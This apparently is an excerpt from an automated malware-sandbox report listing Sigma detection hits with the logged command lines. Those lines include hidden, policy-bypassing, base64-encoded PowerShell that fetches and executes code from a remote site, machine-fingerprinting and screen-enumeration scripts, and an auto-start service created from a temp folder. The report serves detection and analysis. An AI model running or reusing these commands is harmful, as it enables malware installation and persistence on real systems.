AG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA, CommandLine: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -Execution

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAVAAuAEUATgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAHQAUwBUAHIASQBOAEcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBhAFoAQQA9AD0AIgApACkAKQApAC4AQwBPAE4AdABFAE4AdAApACkA , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAVAAuAEUATgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAHQAUwBUAHIASQBOAEcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBhAFoAQQA9AD0AIgApACkAKQApAC4AQwBPAE4AdABFAE4AdAApACkA , CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: powERSheLl.EXE -WInDOwStYle HiDdEN -encOdeDcOmmAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBWAEEAQQB1AEEARQBVAEEAVABnAEIARABBAEUAOABBAFoAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBGAEEASABRAEEAVQB3AEIAVQBBAEgASQBBAFMAUQBCAE8AQQBFAGMAQQBLAEEAQQBvAEEARQBrAEEAVgB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAGgAQQBGAG8AQQBRAFEAQQA5AEEARAAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQ

Sigma detected: Suspicious New Service Creation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , CommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , CommandLine|base64offset|contains: H, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1424, ParentProcessName: cmd.exe, ProcessCommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , ProcessId: 2308, ProcessName: sc.exe

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Source: Process started

Sigma detected: Suspicious PowerShell Invocations - Specific - PowerShell Module

Source: Event Logs

Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro: Data: ContextInfo: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1151 Host ID = ddeda887-052d-4285-8684-e746edbb62f2 Host Application = powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA= Engine Version = 5.1.19041.1151 Runspace ID = 1e4162c5-3753-45aa-8c4b-e816883d2e38 Pipeline ID = 1 Command Name = Add-Type Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = computer\user Connected User = Shell ID = Microsoft.PowerShell, EventID: 4103, Payload: CommandInvocation(Add-Type): "Add-Type"ParameterBinding(Add-Type): name="AssemblyName"; value="System.Windows.Forms", Source: Microsoft-Windows-PowerShell, UserData: , data0: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1151 Host ID = ddeda887-052d-4285-8684-e746edbb62f2 Host Application = powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA= Engine Version = 5.1.19041.1151 Runspace ID = 1e4162c5-3753-45aa-8c4b-e816883d2e38 Pipeline ID = 1 Command Name = Add-Type Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = computer\user Connected User = Shell ID = Microsoft.PowerShell, data1: , data2: CommandInvocation(Add-Type): "Add-Type"ParameterBinding(Add-Type): name="AssemblyName"; value="System.Windows.Forms"

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, CommandLine: powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8244, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, ProcessId: 8520, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAVAAuAEUATgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAHQAUwBUAHIASQBOAEcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBhAFoAQQA9AD0AIgApACkAKQApAC4AQwBPAE4AdABFAE4AdAApACkA , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAVAAuAEUATgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAHQAUwBUAHIASQBOAEcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBhAFoAQQA9AD0AIgApACkAKQApAC4AQwBPAE4AdABFAE4AdAApACkA , CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: powERSheLl.EXE -WInDOwStYle HiDdEN -encOdeDcOmmAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBWAEEAQQB1AEEARQBVAEEAVABnAEIARABBAEUAOABBAFoAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBGAEEASABRAEEAVQB3AEIAVQBBAEgASQBBAFMAUQBCAE8AQQBFAGMAQQBLAEEAQQBvAEEARQBrAEEAVgB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAGgAQQBGAG8AQQBRAFEAQQA5AEEARAAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQ

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oho2nqxk\oho2nqxk.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oho2nqxk\oho2nqxk.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAVAAuAEUATgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAHQAUwBUAHIASQBOAEcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBhAFoAQQA9AD0AIgApACkAKQApAC4AQwBPAE4AdABFAE4AdAApACkA , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4780, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oho2nqxk\oho2nqxk.cmdline", ProcessId: 8388, ProcessName: csc.exe

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Author: frack113: Data: Command: powERSheLl.EXE -WInDOwStYle HiDdEN -encOdeDcOmmAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBWAEEAQQB1AEEARQBVAEEAVABnAEIARABBAEUAOABBAFoAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBGAEEASABRAEEAVQB3AEIAVQBBAEgASQBBAFMAUQBCAE8AQQBFAGMAQQBLAEEAQQBvAEEARQBrAEEAVgB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAGgAQQBGAG8AQQBRAFEAQQA5AEEARAAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARQA0AEEAZABBAEIARgBBAEUANABBAGQAQQBBAHAAQQBDAGsAQQAiAA==" , CommandLine: powERSheLl.EXE -WInDOwStYle HiDdEN -encOdeDcOmmAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBWAEEAQQB1AEEARQBVAEEAVABnAEIARABBAEUAOABBAFoAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBGAEEASABRAEEAVQB3AEIAVQBBAEgASQBBAFMAUQBCAE8AQQBFAGMAQQBLAEEAQQBvAEEARQBrAEEAVgB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcA

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Source: Process started

